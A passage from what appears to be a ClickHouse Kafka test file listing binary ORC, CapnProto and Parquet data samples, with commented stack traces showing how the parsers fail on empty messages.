0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
